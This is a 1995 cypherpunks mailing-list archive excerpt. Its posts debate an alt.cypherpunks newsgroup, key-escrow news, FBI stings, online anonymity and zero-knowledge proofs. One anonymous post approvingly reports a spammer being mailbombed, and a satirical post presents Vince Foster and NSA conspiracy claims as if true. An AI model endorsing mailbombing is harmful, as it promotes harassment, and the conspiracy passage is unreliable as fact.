accomplishmensts. One thing I have been thinking would be nice would be a USENET newsgroup, as mailing lists are a step away from easy access which some people never make. 
It makes it less easy to browse and see what it's about; interacting with majordomo software might seem very intuitive to most members, but not all will be so comfortable signing up their mailbox (which they possibly pay for per K), and may indeed lack the expertise required to do the job. There are several archives of cpunks, but these don't tend to be as well known as newsgroups. More people might come across cypherpunks ideas, and the technology for remailers, disk encryptors, discussions of nym servers, steganography, IPSEC, etc. if they were in a newsgroup, perhaps even within the comp, soc, or sci hierarchies.

One thing I have discovered in myself is a reluctance to subscribe to too many mailing lists, as the volume and management of the resulting traffic piped your way can be overwhelming (yes, I know there are various filters to split off traffic into separate mbox files). I think it is a shame that things like the nym server discussion, which sounded very interesting to me, got split off into a separate group; I'd just as soon see the discussion here, for reluctance-to-subscribe-to-yet-more-groups reasons, and because it sounded like it wasn't very high volume anyway. Same for the stego group discussions. If it's all in one place at least I can skim that for interesting things. Both of those discussions I think would contribute to the signal ratio here.

But Peter's stated aims sound useful: promulgating cypherpunks technology and ideas to as large an audience as possible. Definitely a very important aim, and one that lots of people already devote some time and thought to. Might I suggest that a newsgroup would be a way to go?

There are already a number of security, privacy, and crypto related groups, but they tend to have their own pattern of flow; you know, penet.fi problems on alt.privacy.anon-server, alt.privacy (dunno, not read much), alt.security.pgp PGP usage, David Sternlight fueled discussions, some ITAR stuff, talk.politics.crypto crypto politics, comp.org.eff.talk, there must be a few others.

Peter's FAQ-like document was very nicely worded for avoidance of any connotations of conspiracy or 'punkery' which might put off the less adventurous souls, the more conservative.

How about it? Reckon cypherpunks as a group has enough readers to, hmm, push through a vote for group creation, if the majority thought it was a useful exercise? A group solely for what? Cypherpunks technology, social impacts and education; a place where someone would go with security questions, and to learn about the future of personal and corporate security on the net. If a few people frequented it, with the sort of diligence that a number of people spend time contributing to the alt.security.pgp group, and a useful set of pointers and FAQs were posted frequently, it might become a useful resource.

One URL which I haven't seen pushed all that much, and which impressed me a lot as a very comprehensive list of cypherpunks technology, what it is and where to get it, was Tatu Ylonen's pages on crypto and crypto apps:

http://www.cs.hut.fi/ssh/crypto/

A resource that would look good with a support newsgroup for discussion of just such technology.

I would have thought that if anyone was interested in setting up such a group (Peter? your initiative?), you could tone down the 'cypherpunks' name if you felt it would further the cause of giving the newsgroup wider appeal. I mean, perhaps you would mention 'cypherpunks', 'the mailing list', near the end of the FAQ as further resources and a forum for active discussion, explaining the name first, so that people don't get put off; after they've got that far (read all through your FAQ), presumably they'll be less inclined to let a label bother them.

Adam

From banisar at epic.org Sat Sep 16 04:41:39 1995
From: banisar at epic.org (Dave Banisar)
Date: Sat, 16 Sep 95 04:41:39 PDT
Subject: Web page
Message-ID:

Hi Bruce,

How's it going? I'm back from DK and the UK. I understand you're just coming back from JP (wow, what world travelers we are!). Have you heard from Sutherland? Do we have a title? Page length? It seems to me that we should take out some of the Clipper stuff and put in more on CKE since that's pretty hot at the moment and will further distinguish us from Hoffman's book.

We have also moved up to 56kb FR here in the office. Are you still interested in a home page here? Or do you have one we can link to?

Dave

David Banisar (Banisar at epic.org)        * 202-544-9240 (tel)
Electronic Privacy Information Center   * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     * ftp/gopher/wais cpsr.org
Washington, DC 20003                    * HTTP://epic.digicash.com/epic

From JohnHemming at mkn.co.uk Sat Sep 16 04:44:57 1995
From: JohnHemming at mkn.co.uk (John Hemming CEO MarketNet)
Date: Sat, 16 Sep 95 04:44:57 PDT
Subject: More on ECheques
Message-ID:

1. I was not suggesting that you put your real bank account number in the program. A test number is perfectly adequate.

2. In the UK people advertise their bank account numbers so that people can pay them.

3. If you do use your real bank account number, I will not pay you anything nonetheless.

From enzo at ima.com Sat Sep 16 04:45:56 1995
From: enzo at ima.com (Enzo Michelangeli)
Date: Sat, 16 Sep 95 04:45:56 PDT
Subject: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID:

On Fri, 15 Sep 1995, Jeff Simmons wrote:

> Could anyone point me to information on 'quantum' computing?

Two good starting points are:

http://vesta.physics.ucla.edu/~smolin/index.html

and, in Oxford:

http://eve.physics.ox.ac.uk/QChome.html

Enzo

From jya at pipeline.com Sat Sep 16 05:19:36 1995
From: jya at pipeline.com (John Young)
Date: Sat, 16 Sep 95 05:19:36 PDT
Subject: HRT_web
Message-ID: <199509161219.IAA04673@pipe4.nyc.pipeline.com>

9-16-95. NYPaper Page Oner:

"Computer Stings Gain Favor As Arrests for Smut Increase."

The F.B.I. has plans for its own web to fight computer crimes.

As arrests continued in a high-tech drive against the peddling of child pornography on the nation's largest computer network, the Federal authorities said today that they expected to apply the same surveillance techniques to fight many other computer-related crimes, from consumer and securities fraud to money laundering. One way of combating these crimes, they said, will be for Federal agents to go undercover and appear as prey for unwitting criminals.

Timothy McNally of the F.B.I. said that while the traditional form of surveillance included activities like waiting in cars and watching suspects for hours, "the playing field has now changed" and now requires agents to become more proficient in using computers to thwart crimes.

But some civil liberties experts expressed alarm at the latest surveillance technique, saying it would have a chilling effect on what is now a freewheeling medium.

HRT_web (9 kb)

From dlv at bwalk.dm.com Sat Sep 16 05:30:14 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 16 Sep 95 05:30:14 PDT
Subject: CYPHERPUNK considered harmful
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID:

aba at dcs.exeter.ac.uk writes:

> One thing I have been thinking would be nice would be a USENET
> newsgroup, as mailing lists are a step away from easy access which
> some people never make.

This sounds like a very good idea to me, since I find the flood of e-mail from CP, much of it non-crypto-related, to be annoying. If this traffic were in a newsgroup, it would travel compressed over my phone line, and I might use a killfile on stuff like the CO$ thread. Anything posted to the main cypherpunks mailing list and the spun-off mailing lists (steganography, remailers, nym servers, etc.) could be posted to the newsgroup by making one of the mail2news gateways a subscriber.

> time and thought to. Might I suggest that a newsgroup would be a way
> to go? There are already a number of security, privacy, and crypto
> related groups, but they tend to have their own pattern of flow, you
> know penet.fi problems on alt.privacy.anon-server, alt.privacy (dunno
> not read much), alt.security.pgp pgp usage, David Sternlight fueled
> discussions, some ITAR stuff, talk.politics.crypto, crypto politics,
> comp.org.eff.talk, there must be a few others.
...
> Reckon cypherpunks as a group has enough readers to hmm, push through
> a vote for group creation, if the majority thought it was a useful
> exercise. A group solely for what? cypherpunks technology, social

No vote is needed to create an alt.group: something like 'alt.security.cypherpunks' or 'alt.privacy.cypherpunks'. Just post a proposal to alt.config, post many articles seconding the proposal, let it be discussed for a week, then issue a newgroup.

To create a newsgroup in the 'big 8' (comp., sci., etc.) one needs to deal with unpleasant control freaks like group-advice, news.groups, and David Lawrence. It takes up to 6 months. On the other hand, many sites that have Usenet have comp.* but not alt.*. Their users would still have to use the mailing lists or find another site. To create something like comp.security.cypherpunks (I think this would be the most appropriate place, since there's already c.s.announce, c.s.misc, and c.s.firewalls), talk to the group-advice cabal.

---
Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From rishab at dxm.org Sat Sep 16 07:12:56 1995
From: rishab at dxm.org (Rishab Aiyer Ghosh)
Date: Sat, 16 Sep 95 07:12:56 PDT
Subject: "Use implies consent to monitoring"
Message-ID: <199509161407.HAA13837@infinity.c2.org>

Rich Salz :
> > Please be advised that use constitutes consent to monitoring
>
> Use of what?

Obviously of something that can be monitored; as this is apparently from the ECPA I would assume use of "electronic communications." Of course I haven't verified that this quote is actually from the ECPA; that's what the InterNIC claims it is.

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                          rishab at dxm.org
Editor and publisher: Rishab Aiyer Ghosh        rishab at arbornet.org
Vox +91 11 6853410; 3760335; H 34 C Saket, New Delhi 110017, INDIA

From pfarrell at netcom.com Sat Sep 16 07:22:53 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Sat, 16 Sep 95 07:22:53 PDT
Subject: Wash Post coverage of NIST Key escrow-export
Message-ID: <199509161419.HAA23095@netcom3.netcom.com>

Today's Washington Post has some coverage (finally) of the encryption/key-escrow/FIPS standards issues. Headline is

Feuding again erupts over encryption exports

I typed in the text.

url: http://www.isse.gmu.edu/~pfarrell/nist/post.html

Pat

Pat Farrell      grad student       http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request          #include standard.disclaimer

From unicorn at polaris.mindport.net Sat Sep 16 08:33:50 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sat, 16 Sep 95 08:33:50 PDT
Subject: Linking = Showing = Transferring?
In-Reply-To:
Message-ID:

On Fri, 15 Sep 1995, Charles Lewton wrote:

> On Fri, 15 Sep 1995, Duncan Frissell wrote:
> >
> > > On Thu, 14 Sep 1995, Lucky Green wrote:
> > >
> > > The answer is trivial. If it pisses off the fascists in power enough, you
> > > go to jail or get killed.
> > >
> > As a libertarian nut, I bow to no one in my love of extreme statements.
> > But I feel compelled to squash this particular notion whenever I see it.
> > Randy Weaver really pissed off the Feds and did not go to jail (except
> > during trial) and received a $3.1 million settlement. (.1 to him, 3 to
> > the kids but they are minors).
> >
> > DCF
> >
>
> Not quite squashed, Duncan. Bullet placement (poor by some standards)
> is all that prevented Mr. Weaver from croaking like his unfortunate wife.
> She is said to have "pissed off" the feds but was not charged with a
> single actionable item yet she remains quite dead.
>
> Unless I have missed something somewhere, no TLA is concerned in the slightest
> with individual liberty. That notion should keep a rational person awake
> nights.

Much as I like the concept of checks and balances, this is an example of the evils of power balanced and checked ex post, and not ex ante.

>
> Chuck
>

From dsc at swcp.com Sat Sep 16 08:57:10 1995
From: dsc at swcp.com (Dar Scott)
Date: Sat, 16 Sep 95 08:57:10 PDT
Subject: (Noise) X-Files anarchist
Message-ID:

I hardly watch TV ...blah, blah..., but I saw X-files last night. A very minor character was a cryptohacker who--to his surprise--brute-forced a military key for some files. He was described as an anarchist.

To _my_ surprise, this anarchist was not associated with violence or lunatic ravings. He was shown as reading a book entitled something like Survey of Modern Conspiracy Theories. I see this as an improvement in the stereotype of computer-associated anarchists. And this I see as a good thing, since I think there is a lot that could be learned from anarchists.

I think the character was killed, but I may have missed something.

Dar

===========================================================
Dar Scott                     Home phone: +1 505 299 9497
Dar Scott Consulting          Voice:      +1 505 299 5790
8637 Horacio Place NE         Email:      darscott at aol.com
Albuquerque, NM 87111                     dsc at swcp.com
                              Fax:        +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From unicorn at polaris.mindport.net Sat Sep 16 09:00:01 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sat, 16 Sep 95 09:00:01 PDT
Subject: CYPHERPUNK considered harmful
In-Reply-To: <199509152013.QAA18005@panix.com>
Message-ID:

On Fri, 15 Sep 1995, David C. Lambert wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Peter Trei wrote:
>
> > Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> > nutcases for many people, and are a barrier to getting our ideas
> > across. I'm not saying this pigeonholing is correct - in fact I despise
> > people who judge a book by its cover, but so many people DO make such
> > snap judgements that we need to take this into account when talking to
> > the general public.
>
> Two of the responses to the "An opportunity..." post unapologetically
> admitted that they refused to read the text of the message due to the
> presence of the word "cypherpunk" in the first sentence.
>
> Shows you what we're up against.
>
> BTW, I'm not for changing the name of the list, but I do see the logic
> in a more establishment-friendly name to use when lobbying the public.

So found the propaganda arm of the cypherpunks with a snazzy and PC name. Distribute watered-down cypherpunk "teachings" in more benign forms which hide their true (Ohhh! Scary!) potential in an effort to make them commonly acceptable to joe sixpack.

Can't we all see what road this leads down? At the risk of politicizing the issue, I wouldn't be the first to call this "left-speak" or "term-sanitizing."

Really the core issue is that the citizens of their respective nations need to either:

1> See cryptography for the important individual rights issue that it is and latch on to the basic desire for free and unmonitored commerce and exchange without censorship or observation.

or

2> Decide that they are not interested in the issues because these issues are too radical, or simply because their own political ideas fall left (or statist) of this spectrum.

Personally, and being quite defeatist and selfish, while I would like a widespread population-wide strong crypto system aesthetically, in the end I don't care if every joe sixpack on the planet uses real crypto, just so long as those I am to conduct commerce (of data or goods) with do. The final judgement will be in the advantage of velocity and security of transactions and the wealth that this "allocates" to those wise enough to adopt crypto exchange systems. Evolution in action. If this makes me elitist, so be it.

Granted, there are non-cryptoanarchy applications of crypto which I am ignoring. My fingers are tired and I believe them incidental.

>
> David C. Lambert
> dcl at panix.com
> (finger for PGP public key)
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQCVAwUBMFneAqpplsfgM88VAQE+5wP9GZrIoComyFDeQ6brTLJwZ2oamry3IfC7
> XhlqMlAZnC2b1w521nm085nZKtO9/Ru9Fw3BllPinG8nGcBggr9zkH4Ba+Zbezh0
> FKK29d7wFGQz1d5JfyYCZhl4dTBdbpnU4jd5Rb27XtvP9livAeR/HIwNAJMccSCX
> qO/kxlVRRZg=
> =1Lxr
> -----END PGP SIGNATURE-----
>

From aba at atlas.ex.ac.uk Sat Sep 16 09:22:27 1995
From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk)
Date: Sat, 16 Sep 95 09:22:27 PDT
Subject: CYPHERPUNK considered harmful
Message-ID: <15408.9509161506@exe.dcs.exeter.ac.uk>

Dimitri Vulis writes:

> Anything posted to the main cypherpunks mailing list and the
> spun-off mailing lists (steganography, remailers, nym servers, etc)
> could be posted to the newsgroup by making one of the mail2news
> gateways a subscriber.
Not sure that would be a good idea; then the newsgroup would *be* cypherpunks, and the cypherpunks list would have effectively become a USENET newsgroup (albeit with some mail2news stuff behind). For me part of the fun of cypherpunks is that things get discussed here which don't get discussed anywhere else; things happen here first, the rc4 leak, that kind of thing: if it's happening crypto-wise, it's on cypherpunks. You might lose some of the community feel to it if it was gated straight to a USENET group; I mean at that point the majordomo list server would have become a news2mail gateway.

I was thinking more that you would have a separate newsgroup, but perhaps my feelings are more of the elitist stuff Peter was referring to. Still, I see no need to change a good thing; can't the two co-exist separately? Peter's stated aims didn't coincide with my perception of the cypherpunks list's goals, i.e. the list (modulo cpunks write code wars) seems to me to be about people who share the common goal of free crypto for everyone, discussing how to go about this, writing code to help it happen, and analysis of what the government is up to where it infringes on cypherpunk goals. I think Peter's goals sounded more amenable to a forum which was a) easily accessible, and b) had a stated aim of a kind of cypherpunk technology transfer forum.

Perhaps I am being elitist, so shoot me, but I like cypherpunks the list the way it is!

For your convenience reading cpunks there are a couple of solutions to the deluge-of-mail problem: there used to be an nntp server at nntp.hks.net which served cypherpunks as a newsgroup over nntp (I haven't used this in a while as it appeared to be down or empty or something for a while), there are filters which you can set up to put all cpunks traffic in a separate mbox, and there are a couple of digest forms of cpunks around also. The filter won't help your download time; the digest (I think Hal offers / was offering an encrypted digest which would also be compressed) and the nntp server might.

> > Reckon cypherpunks as a group has enough readers to hmm, push through
> > a vote for group creation, if the majority thought it was a useful
> > exercise. A group solely for what? cypherpunks technology, social
>
> No vote is needed to create an alt.group: something like
> 'alt.security.cypherpunks' or 'alt.privacy.cypherpunks'. Just post a proposal
> to alt.config, post many articles seconding the proposal, let it be discussed
> for a week, then issue a newgroup.

Me, I quite like the cypherpunk name; I reckon it would be best from a distribution pov to get a big8 group, as you discuss.

> To create a newsgroup in the 'big 8' (comp., sci., etc) one needs to
> deal with unpleasant control freaks like group-advice, news.groups,
> and David Lawrence. It takes up to 6 months. On the other hand,
> many sites that have Usenet have comp.* but not alt.*. Their users
> would still have to use the mailing lists or find another site. To
> create something like comp.security.cypherpunks (I think this would
> be the most appropriate place, since there's already c.s.announce,
> c.s.misc, and c.s.firewalls), talk to the group-advice cabal.

I'll let other people argue about newsgroup names.

Adam

From unicorn at polaris.mindport.net Sat Sep 16 09:31:09 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sat, 16 Sep 95 09:31:09 PDT
Subject: CYPHERPUNK considered harmful.
In-Reply-To: <9509151915.AA16093@toad.com>
Message-ID:

On Fri, 15 Sep 1995, Peter Trei wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Think about it. Which future would you rather see:
>
> 1. Lots of people demanding strong unescrowed crypto for what you
> consider rather peripheral and politically unaware reasons, which
> you have educated them in.
>
> 2. Unescrowed crypto banned, with those who promote considered
> aiders and abettors of the four horsemen, (but boy are they
> ideologically pure!).

3. Unescrowed crypto banned, with advanced stego, panic passwords, stealth PGP, incorporated remailers all across international borders making offenders impossible to identify or catch.

Given the degree to which I believe 1. unlikely in the numbers required to avoid the unescrowed encryption ban, I believe the goal is to propagate crypto far enough to at least have a salient "underground" of participants.

Some months ago I called for advanced stego and stealth PGP as well as larger keys in the event we all had to go "into the crypto closet" for a time. I call for them again.

>
> Peter Trei
>
> I probably won't see any responses till Monday. I'm going for a
> weekend at a resort on Lake Winnipesaukee. If you need me, I'll be
> in the hot tub. :-)
>
>
>
>
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQCVAwUBMFmmK1QxhKXe9s8VAQE+tgP+NcKdGvBeJpa8AHGr/RhKCHudZP2qmRNP
> J699UCCvN006ywIjurjuis48VPj26uxBkcRbeuzNxGlKmZqXIkS0vEcFjrrZhBsK
> V9dLFFGTZ6JG3nK++mleW1wQB/F0azXXvXKJWa6R+Tnj1oo2ADUxGNQMs9IVmgR3
> zsyK3fej+IQ=
> =YqDH
> -----END PGP SIGNATURE-----
>
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team
> Process Software Corporation
> http://www.process.com
> trei at process.com
>

From tcmay at got.net Sat Sep 16 09:34:31 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:34:31 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID:

Should there be an "alt.cypherpunks" type of newsgroup instead of this mailing list? (Or, to use my punchline at the end: Let the market decide.)

At 10:26 AM 9/16/95, aba at atlas.ex.ac.uk wrote:

>One thing I have been thinking would be nice would be a USENET
>newsgroup, as mailing lists are a step away from easy access which
>some people never make.
>It makes it less easy to browse and see what
>it's about, interacting with majordomo software might seem very
>intuitive to most members, but not all will be so comfortable signing
>up their mailbox (which they possibly pay for per K), and may indeed
>lack the expertise required to do the job. There are several
>archives of cpunks, but these don't tend to be as well known as
>newsgroups. More people might come across cypherpunks ideas, and the
>technology for remailers, disk encryptors, discussions of nym servers,
>steganography, IPSEC, etc if they were in a newsgroup, perhaps even
>within the comp, soc, or sci hierarchies.

It would be easy to create "alt.cypherpunks." I've been expecting to see it happen for the last 3 years. It could still happen. In fact, there's been talk of doing it (sorry for the passive "there has been talk," but I'll let the folks talking about doing it do the talking about it here).

"Alt" groups are easy to create. (Newcomers to the list might like to know that one of our founding members, John Gilmore, created the "alt.*" option some years back, with "alt.drugs" I think it was.)

However, how many _newsgroups_ do any of you know of that have anywhere near the sense of cohesion and "community" that our mailing list has? Newsgroups encourage wider exposure to ideas, but also make "hit-and-run" disruptions more likely. The speed bump of having to figure out how to subscribe to a mailing list, and the expectation that one will remain "in the community" for a while, moderates flamish behavior and encourages people to try to learn.

Newsgroups encourage very wide browsing, which has some advantages. But also a lack of persistent contributors and a lack of community. Mailing lists _tend_ to have much tighter feedback loops, where most messages are read by most members, or at least are glanced at. Newsgroups have a different character, and topics get repeated even more often.

Interestingly, several crypto folks I know have said they have stopped seriously using the "sci.crypt" and "talk.politics.crypto" newsgroups and are concentrating on smaller mailing lists of co-workers and committee members (task forces, working groups, etc.). In some sense, the Cypherpunks list is somewhere in-between a full newsgroup and a small working mailing list.

I could go on, but I ask instead that readers do their own investigation.

First, are there any newsgroups out there that have the atmosphere we have? (I'm not saying there aren't any, and finding some examples to look at might be instructive...)

Second, would the benefits of wider exposure, as "alt.cypherpunks," more than balance out the negative effects mentioned above?

Third, is "news reading" software really that much better than "mail reading" software? For me, for example, I use Eudora Pro and can filter all messages by words in the thread name, by author, by mailing list name, etc. And _saving_ messages is the default, unlike newsgroups, where I must explicitly save an article to a file. So, for me, I have a very large "Cypherpunks archives," whereas I don't have a large "talk.politics.crypto" archive (partly because of the lack of community there....).

This brings up a final point: with more than 10,000 newsgroups, including nearly a dozen devoted to crypto, PGP, security, and anonymity, aren't there already enough? A likely effect of "alt.cypherpunks" is this:

Subject: Re: ITARs Worked for Less than One Day
Date: Sun, 10 Sep 1995 00:18:38 GMT
From: david at sternlight.com (David Sternlight)
Organization: DSI/USCRPAC
Newsgroups: sci.crypt, alt.security.pgp, talk.politics.crypto, alt.cypherpunks

That is, "alt.cypherpunks" just gets added to the cc: list of a lot of posts.

But, if anyone wants it, create it. Then people can vote with their feet. Both the list and the newsgroup can co-exist, and if the newsgroup "wins," the list can be dropped.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From unicorn at polaris.mindport.net Sat Sep 16 09:35:48 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sat, 16 Sep 95 09:35:48 PDT
Subject: More on ECheques
In-Reply-To:
Message-ID:

On Sat, 16 Sep 1995, John Hemming CEO MarketNet wrote:

> 1. I was not suggesting that you put your real bank account number
> in the program. A test number is perfectly adequate.
>
> 2. In the UK people advertise their Bank Account numbers so that people
> can pay them.
>
> 3. If you do use your real bank account number, I will not pay you
> anything nonetheless.

(But I will clone some checks and drain your account quickly).

From unicorn at polaris.mindport.net Sat Sep 16 09:39:41 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sat, 16 Sep 95 09:39:41 PDT
Subject: (Noise) X-Files anarchist
In-Reply-To:
Message-ID:

On Sat, 16 Sep 1995, Dar Scott wrote:

> I hardly watch TV ...blah, blah..., but I saw X-files last night. A very
> minor character was a cryptohacker who--to his surprise--brute-forced a
> military key for some files. He was described as an anarchist.
>
> To _my_ surprise, this anarchist was not associated with violence or
> lunatic ravings. He was shown as reading a book entitled something like
> Survey of Modern Conspiracy Theories.

"50 Greatest Conspiracies"

But I never watch T.V.

>
> I think the character was killed, but I may have missed something.
>
> Dar
>
> ===========================================================
> Dar Scott                     Home phone: +1 505 299 9497
>
> Dar Scott Consulting          Voice:      +1 505 299 5790
> 8637 Horacio Place NE         Email:      darscott at aol.com
> Albuquerque, NM 87111                     dsc at swcp.com
>                               Fax:        +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
>
>
>

From tcmay at got.net Sat Sep 16 09:50:13 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:50:13 PDT
Subject: Explaining Zero Knowledge to your children
Message-ID:

At 3:10 AM 9/15/95, hallam at w3.org wrote:

>The cave analogy sucks.
>
>The way I tried to explain Zero Knowledge is this:
>
>
>Imagine that you have a duplicator device which you want to sell, you don't
>want to explain why it works to the buyer however since then they would
>just make their own (patents have been abolished by this time). You also don't
>want the buyer to be able to prove to anyone else that you have a duplicator.
>
>So what you do is you play the "what hand is it in game" and you do this
>with a $10 bill provided by the buyer and who records its serial number. You
>hold the original article in one hand and the duplicate in the other. The
>buyer chooses one hand, you show the article in that hand. The buyer knows
>you had a 50:50 chance of a lucky guess so you do it again, each time the
>probability of getting it right by a lucky guess halves. After 10 tries or so
>it is virtually certain that you were not faking.
>
>
>Any better ideas...

Clever, but I think it's missing an important element of zero knowledge interactive proof systems.

For example, why not simply open _both_ hands? By opening both hands one shows immediately that one has a duplicator, but does not show how the duplicator works. The same results are obtained with perfect certainty in _one_ round that the ZKIPS approach takes N rounds (as N gets large).

Granted, this fails the "don't want the buyer to be able to prove to anyone else that you have a duplicator" test, but I don't think that is central to ZKIPS. I think a more important test is "don't show others how to make matter duplicators."

Matter duplicators are "self-demonstrating" without revealing how they work, so they don't fit the model of (or create a need for) software-based ZKIPS.

For example, in the Hamiltonian cycle example, the Prover demonstrates to the Skeptic either the set of nodes, with the nodes labelled, or a Hamiltonian cycle, with the nodes unlabelled. If he shows _both_ the set of nodes _and_ a Hamiltonian cycle, then he's given the Skeptic the whole shebang. In Phill's example, he's just taught the Skeptic "how to make a matter duplicator."

But I applaud the creation of new and simpler examples, and maybe I'm wrong and Phill's example captures the essence of zero knowledge interactive proofs. I'll think about it some more.

Comments?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From hroller at c2.org Sat Sep 16 09:53:30 1995
From: hroller at c2.org (hroller Mixmaster)
Date: Sat, 16 Sep 95 09:53:30 PDT
Subject: Arnold Bowker and John Joslin vs. Privacy
Message-ID: <199509161647.JAA23365@infinity.c2.org>

"Case Could End Anonymity of Computer Network Users"
by Brian Bergstein (Associated Press)

Anonymity and freedom of speech in cyberspace are being challenged by a Caribbean resort owner in a court case that could dramatically restrict the rights of computer network users.

The resort owner and scuba instructor claim that they were defamed on a computer bulletin board by an anonymous user, and they asked a judge this week to force America Online to reveal the name of the subscriber so they can sue the person for libel.

If Arnold Bowker and John Joslin are successful in obtaining the name, it could have serious implications for millions of people who use the Internet to think, write and debate in a world where they are identified by their ideas, not their names.

Technology experts fear a morass of court cases that would hold computer users accountable for what they say anonymously.

"What this case brings up is the specter of millions of libel suits every time there's a disagreement on the Internet," said Daniel Weitzner of the Center for Democracy and Technology in Washington. "I think it's a critical issue."

Several calls seeking comment from officials at America Online were not immediately returned Friday.

Abraham Haddad, chairman of the computer science department at Northwestern University, said the anonymity of cyberspace should be maintained as long as it was not being used to commit a crime.

"There's really a need to protect people's privacy as long as no laws have been broken," Haddad said.

From ravage at einstein.ssz.com Sat Sep 16 09:57:15 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Sat, 16 Sep 95 09:57:15 PDT
Subject: alt.cypherpunks
Message-ID: <199509161706.MAA03037@einstein.ssz.com>

Hi all,

My vote is to let the folks on usenet sink in their own quagmire of ignorance about what we do. This list is no secret. If somebody wants to get into the 'game' let them bloody well subscribe.

Ta ta.

Jim Choate
CyberTects
ravage at einstein.ssz.com

From tcmay at got.net Sat Sep 16 09:58:18 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:58:18 PDT
Subject: (Noise) X-Files anarchist
Message-ID:

At 3:56 PM 9/16/95, Dar Scott wrote:

>I hardly watch TV ...blah, blah..., but I saw X-files last night.
A very >minor character was a cryptohacker who--to his surprise--brute-forced a >military key for some files. He was described as an anarchist. > >To _my_ surprise, this anarchist was not associated with violence or >lunatic ravings. He was shown as reading a book entitled something like >Survey of Modern Conspiracy Theories. I see this as an improvement in the >stereotype of computer-associated anarchists. And this I see as a good >thing, since I think there is a lot that could be learned from anarchists. Vince Foster was technical advisor to "The X-Files." The NSA had him killed at Fort Darcy because he was getting too close to the Bilderbergers and their control of the secret UFO technology first given to the Nazis and then transferred to Winnemucca, Nevada as part of Operation Paperclip. The pilot who flew Bush in an SR-71 to negotiate with the Iranians to delay the release of the hostages and so defeat Carter in 1980 is also the author of "Nomenclature of a Conspiracy Cabal," one of the books shown in that episode. President Clinton, at the Underground White House near Edwards Air Force Base, OKed the hit on Foster, even though "The X-Files" was one of his favorite shows. The Greys must be appeased. --Klaus! von Future Prime, who actually has several dozen books on these and similar subjects From nobody at alpha.c2.org Sat Sep 16 10:05:30 1995 From: nobody at alpha.c2.org (Anonymous) Date: Sat, 16 Sep 95 10:05:30 PDT Subject: SPAM bait In-Reply-To: <9509152041.AA21715@argosy.MasPar.COM> Message-ID: <199509161700.KAA24077@infinity.c2.org> David G. Koontz (koontz at MasPar.COM) wrote: : To: janet.dove at ledip.py : Subject: Re: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Tit Don't worry, "Janet Dove", or actually sanghi3 at grfn.org got mailbombed severely for this one. I'm just glad he doesn't know how to use remailers. From tcmay at got.net Sat Sep 16 10:18:54 1995 From: tcmay at got.net (Timothy C. 
May)
Date: Sat, 16 Sep 95 10:18:54 PDT
Subject: Digital Fingerprinting
Message-ID: 

At 6:57 AM 9/16/95, Alan Olsen wrote:

>I seem to remember a software piracy case from a number of years back. The
>case was settled by Apple showing that their code had been copied by the
>copyright "easteregg" hidden in the roms. Made for a quick and effective
>demonstration in court. (The story may be apocryphal, but it makes for an
>example as to how such things do have a (supposed) valid use in protecting
>code from being snagged by other companies.)

And someone just cited the same (or very similar) example, where the "quick and effective demonstration" nevertheless resulted (they said) in an acquittal. So, which way did it go?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From hallam at w3.org  Sat Sep 16 10:34:22 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 16 Sep 95 10:34:22 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: 
Message-ID: <9509161733.AA03680@zorch.w3.org>

>Should there be an "alt.cypherpunks" type of newsgroup instead of this
>mailing list?

Bad idea, it would simply mean that every kook on USEnet would add alt.cypherpunks onto the crossposting line. We would have black helicopters, gun loons, Waco Wako's, Loonytarians and Turkish government propaganda spamming forever.

